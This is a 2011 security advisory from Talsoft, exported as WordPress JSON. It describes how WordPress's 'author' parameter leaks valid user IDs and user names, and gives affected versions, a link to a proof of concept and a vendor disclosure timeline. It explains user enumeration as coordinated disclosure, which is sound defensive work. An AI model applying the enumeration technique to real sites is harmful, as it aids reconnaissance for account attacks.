{"id":1388,"date":"2011-05-26T09:35:27","date_gmt":"2011-05-26T12:35:27","guid":{"rendered":"http:\/\/www.talsoft.com.ar\/?p=1388"},"modified":"2011-05-26T09:35:27","modified_gmt":"2011-05-26T12:35:27","slug":"talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure","status":"publish","type":"post","link":"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/","title":{"rendered":"Talsoft Advisory Security &#8211; WordPress User ID and User Name Disclosure"},"content":{"rendered":"<h3>I. Advisory information<\/h3>\n<p>Title: WordPress User IDs and User Names Disclosure<br \/>\nAdvisory Id: TALSOFT-2011-0526<br \/>\nAdvisory URL: <a title=\"http:\/\/www.talsoft.com.ar\/index.php\/research\/security-advisories\/wordpress-user-id-and-user-name-disclosure\" href=\"..\/..\/index.php\/research\/security-advisories\/wordpress-user-id-and-user-name-disclosure\">http:\/\/www.talsoft.com.ar\/index.php\/research\/security-advisories\/wordpress-user-id-and-user-name-disclosure<\/a><br \/>\nDate published: 2011-05-26<br \/>\nVendors contacted: WordPress<br \/>\nAuthor: Ver\u00f3nica Valeros<\/p>\n<h3>II. Vulnerability information<\/h3>\n<p>Class: Insecure Direct Object References (CWE-715)<br \/>\nImpact: Low<br \/>\nRemotely Exploitable: Yes<br \/>\nLocally Exploitable:  Yes<\/p>\n<h3>III. Overview<\/h3>\n<p>WordPress platforms use a parameter called \u2018author\u2019. This parameter  accepts integer values and represents the \u2018User ID\u2019 of users in the web  site. For example: http:\/\/www.example.com\/?author=1<br \/>\nThe problems found are:<\/p>\n<ol>\n<li>User ID values are generated consecutively.<\/li>\n<li>When a valid User ID is found, WordPress redirects to a web page with the name of the author.<\/li>\n<\/ol>\n<p>These problems trigger the following attack vectors:<\/p>\n<ol>\n<li>The query response discloses whether the User ID is enabled.<\/li>\n<li>The query response leaks (by redirection) the User Name corresponding with that User ID. (See update for version 3.1.3)<\/li>\n<\/ol>\n<p>User IDs can be disabled, leaving holes within the consecutive  numbers. Therefore, when an invalid User ID is sent, no redirection is  done and no information is disclosed.<\/p>\n<p>Also, the attack can be automated, sending multiple queries to  extract valid User Names and User IDs from the vulnerable web sites.<\/p>\n<p><em>Update:<\/em><\/p>\n<p>In version 3.1.3 the redirection explained in the second attack  vector is not done, but is still possible to find the User Name in the  source code. Therefore, this version is still vulnerable.<\/p>\n<h3>IV. Affected versions<\/h3>\n<p>This issue was tested in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2. Other versions were not tested and may be vulnerable.<\/p>\n<h3>V.  Non affected versions<\/h3>\n<p>Unknown.<\/p>\n<h3>VI. Proof of concept<\/h3>\n<p>A Proof of Concept (PoC) is available at: <a title=\"wp-userdata-disclosure-PoC.py.tar.gz\" href=\"..\/wp-content\/uploads\/2011\/05\/wp-userdata-disclosure-PoC.py_.tar.gz\">wp-userdata-disclosure-PoC.py.tar.gz<\/a><\/p>\n<h3>VII. Solution<\/h3>\n<p>WordPress version 3.1.3 fixes the redirection problem, but user names  are still been disclosed in the HTML code. No solution was provided for  this last problem.<\/p>\n<h3>VIII. Disclosure timeline<\/h3>\n<ul>\n<li>2011-03-14:\n<ul>\n<li>Vulnerability was identified.<\/li>\n<\/ul>\n<\/li>\n<li>2011-05-11:\n<ul>\n<li>WordPress security team was contacted.<\/li>\n<\/ul>\n<\/li>\n<li>2011-05-12:\n<ul>\n<li>WordPress confirmed the vulnerability.<\/li>\n<\/ul>\n<\/li>\n<li>2011-05-25:\n<ul>\n<li>WordPress released version 3.1.3, which included a fix for canonical  redirection problem but did not included a fix for the source code  problem.<\/li>\n<li>WordPress security team was informed that after the release of version 3.1.3 the vulnerability was still exploitable.<\/li>\n<li>WordPress team agreed to release the security advisory.<\/li>\n<\/ul>\n<\/li>\n<li>2011-05-26:\n<ul>\n<li>The advisory was released.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h3>IX. Credits<\/h3>\n<p>This vulnerability was discovered and reported by Ver\u00f3nica Valeros (veronicavaleros at talsoft.com.ar)<\/p>\n<h3>X. Disclaimer<\/h3>\n<p>The information provided in this document is for information purposes  only. Talsoft S.R.L. accepts no responsibility for any damage caused by  the use or misuse of this information. The content of this advisory may  be distributed freely, provided that no fee is charged for this  distribution and proper credit is given.<\/p>\n<h3>XI. About Talsoft S.R.L.<\/h3>\n<p>Talsoft S.R.L is a growing company with the mission to provide solutions in the following areas:<\/p>\n<ul>\n<li>Information Security<\/li>\n<li>Technology administration<\/li>\n<li>Open source solutions<\/li>\n<li>Trainings and courses<\/li>\n<\/ul>\n<p>Talsoft S.R.L. is also involved in many information security research projects.<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I. Advisory information Title: WordPress User IDs and User Names Disclosure Advisory Id: TALSOFT-2011-0526 Advisory URL: http:\/\/www.talsoft.com.ar\/index.php\/research\/security-advisories\/wordpress-user-id-and-user-name-disclosure Date published: 2011-05-26 Vendors contacted: WordPress Author: Ver\u00f3nica Valeros II. Vulnerability information Class: Insecure Direct Object References (CWE-715) Impact: Low Remotely Exploitable: Yes Locally Exploitable: Yes III. Overview WordPress platforms use a parameter called \u2018author\u2019. This parameter accepts [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-1388","post","type-post","status-publish","format-standard","hentry","category-profesional"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>TalSoft - Seguridad Inform\u00e1tica Empresarial - Talsoft Advisory Security - WordPress User ID and User Name Disclosure<\/title>\n<meta name=\"description\" content=\"Talsoft transforma la visi\u00f3n de las empresas para que puedan proteger su informaci\u00f3n cr\u00edtica y confidencial frente ataques inform\u00e1ticos. Cons\u00faltenos sin cargo.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Leandro Ferrari\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/\"},\"author\":{\"name\":\"Leandro Ferrari\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/83d2ebde035a5a030c14e522351953c8\"},\"headline\":\"Talsoft Advisory Security &#8211; WordPress User ID and User Name Disclosure\",\"datePublished\":\"2011-05-26T12:35:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/\"},\"wordCount\":508,\"publisher\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#organization\"},\"articleSection\":[\"Profesional\"],\"inLanguage\":\"en-GB\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/\",\"url\":\"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/\",\"name\":\"TalSoft - Seguridad Inform\u00e1tica Empresarial - Talsoft Advisory Security - WordPress User ID and User Name Disclosure\",\"isPartOf\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#website\"},\"datePublished\":\"2011-05-26T12:35:27+00:00\",\"description\":\"Talsoft transforma la visi\u00f3n de las empresas para que puedan proteger su informaci\u00f3n cr\u00edtica y confidencial frente ataques inform\u00e1ticos. Cons\u00faltenos sin cargo.\",\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#website\",\"url\":\"https:\/\/www.talsoft-security.com\/site\/\",\"name\":\"TalSoft TS - Services IT Security\",\"description\":\"Talsoft is transforming awareness, control and decision-making power so that companies can protect their critical and confidential information from computer attacks.\",\"publisher\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.talsoft-security.com\/site\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-GB\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#organization\",\"name\":\"Talsoft TS\",\"url\":\"https:\/\/www.talsoft-security.com\/site\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.talsoft-security.com\/site\/wp-content\/uploads\/2014\/02\/talsoft_logo_270x125.png\",\"contentUrl\":\"https:\/\/www.talsoft-security.com\/site\/wp-content\/uploads\/2014\/02\/talsoft_logo_270x125.png\",\"width\":270,\"height\":125,\"caption\":\"Talsoft TS\"},\"image\":{\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"http:\/\/www.facebook.com\/talsoftsrl\",\"https:\/\/x.com\/talsoft\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/83d2ebde035a5a030c14e522351953c8\",\"name\":\"Leandro Ferrari\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-GB\",\"@id\":\"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/cd259c10675b9fd302b2e6264231febeeeb3de578400cf8c91c6577e50a0d34a?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/cd259c10675b9fd302b2e6264231febeeeb3de578400cf8c91c6577e50a0d34a?s=96&d=mm&r=g\",\"caption\":\"Leandro Ferrari\"},\"sameAs\":[\"http:\/\/www.talsoft.com.ar\",\"https:\/\/www.facebook.com\/talsoftsrl\/\",\"https:\/\/x.com\/avatar_leandro\"],\"url\":\"https:\/\/www.talsoft-security.com\/site\/author\/leandro\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"TalSoft - Seguridad Inform\u00e1tica Empresarial - Talsoft Advisory Security - WordPress User ID and User Name Disclosure","description":"Talsoft transforma la visi\u00f3n de las empresas para que puedan proteger su informaci\u00f3n cr\u00edtica y confidencial frente ataques inform\u00e1ticos. Cons\u00faltenos sin cargo.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/","twitter_misc":{"Written by":"Leandro Ferrari","Estimated reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/#article","isPartOf":{"@id":"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/"},"author":{"name":"Leandro Ferrari","@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/83d2ebde035a5a030c14e522351953c8"},"headline":"Talsoft Advisory Security &#8211; WordPress User ID and User Name Disclosure","datePublished":"2011-05-26T12:35:27+00:00","mainEntityOfPage":{"@id":"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/"},"wordCount":508,"publisher":{"@id":"https:\/\/www.talsoft-security.com\/site\/#organization"},"articleSection":["Profesional"],"inLanguage":"en-GB"},{"@type":"WebPage","@id":"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/","url":"https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/","name":"TalSoft - Seguridad Inform\u00e1tica Empresarial - Talsoft Advisory Security - WordPress User ID and User Name Disclosure","isPartOf":{"@id":"https:\/\/www.talsoft-security.com\/site\/#website"},"datePublished":"2011-05-26T12:35:27+00:00","description":"Talsoft transforma la visi\u00f3n de las empresas para que puedan proteger su informaci\u00f3n cr\u00edtica y confidencial frente ataques inform\u00e1ticos. Cons\u00faltenos sin cargo.","inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.talsoft-security.com\/site\/talsoft-advisory-security-wordpress-user-id-and-user-name-disclosure\/"]}]},{"@type":"WebSite","@id":"https:\/\/www.talsoft-security.com\/site\/#website","url":"https:\/\/www.talsoft-security.com\/site\/","name":"TalSoft TS - Services IT Security","description":"Talsoft is transforming awareness, control and decision-making power so that companies can protect their critical and confidential information from computer attacks.","publisher":{"@id":"https:\/\/www.talsoft-security.com\/site\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.talsoft-security.com\/site\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-GB"},{"@type":"Organization","@id":"https:\/\/www.talsoft-security.com\/site\/#organization","name":"Talsoft TS","url":"https:\/\/www.talsoft-security.com\/site\/","logo":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/logo\/image\/","url":"https:\/\/www.talsoft-security.com\/site\/wp-content\/uploads\/2014\/02\/talsoft_logo_270x125.png","contentUrl":"https:\/\/www.talsoft-security.com\/site\/wp-content\/uploads\/2014\/02\/talsoft_logo_270x125.png","width":270,"height":125,"caption":"Talsoft TS"},"image":{"@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/logo\/image\/"},"sameAs":["http:\/\/www.facebook.com\/talsoftsrl","https:\/\/x.com\/talsoft"]},{"@type":"Person","@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/83d2ebde035a5a030c14e522351953c8","name":"Leandro Ferrari","image":{"@type":"ImageObject","inLanguage":"en-GB","@id":"https:\/\/www.talsoft-security.com\/site\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/cd259c10675b9fd302b2e6264231febeeeb3de578400cf8c91c6577e50a0d34a?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/cd259c10675b9fd302b2e6264231febeeeb3de578400cf8c91c6577e50a0d34a?s=96&d=mm&r=g","caption":"Leandro Ferrari"},"sameAs":["http:\/\/www.talsoft.com.ar","https:\/\/www.facebook.com\/talsoftsrl\/","https:\/\/x.com\/avatar_leandro"],"url":"https:\/\/www.talsoft-security.com\/site\/author\/leandro\/"}]}},"_links":{"self":[{"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/posts\/1388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/comments?post=1388"}],"version-history":[{"count":1,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/posts\/1388\/revisions"}],"predecessor-version":[{"id":1389,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/posts\/1388\/revisions\/1389"}],"wp:attachment":[{"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/media?parent=1388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/categories?post=1388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.talsoft-security.com\/site\/wp-json\/wp\/v2\/tags?post=1388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}